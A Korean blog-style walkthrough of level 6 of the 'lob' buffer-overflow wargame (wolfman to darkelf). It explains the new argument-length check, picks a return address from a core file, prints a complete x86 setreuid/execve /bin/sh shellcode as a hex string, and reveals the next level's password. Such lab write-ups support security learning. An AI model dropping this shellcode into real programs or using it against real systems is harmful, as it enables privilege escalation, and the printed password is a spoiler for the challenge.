lob 6번 풀이 wolfman -> darkelf

wolfman으로 로그인 해줍니다.

cat darkelf.c

더 추가된 부분은 check the length of argument

부분인데 만약 argv[1]이 48보다 크면  프로그램을 종료하는 부분이 생겨났습니다.

그런데 그동안 저희는 argv[1]의 개수를 딱 48개를 넣어줬으므로

딱히 상관없는 부분이라고 생각됩니다.

 

그 전과 같이 argv[2]의 주소를 ret의 넣으면 될거 같습니다.

 

tmp를 만들어줍니다.

core 파일을 분석해서 풀어봅시당!!

 

 

주소를 0xbffffc30로 잡고 하겠습니다.

 

쉘코드

 

\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80

 

정상적으로 쉘이 따진 것을 보실 수 있습니다.

호우

이번것도 clear!

 

darkelf의 비밀번호는 kernel crashed

입니다.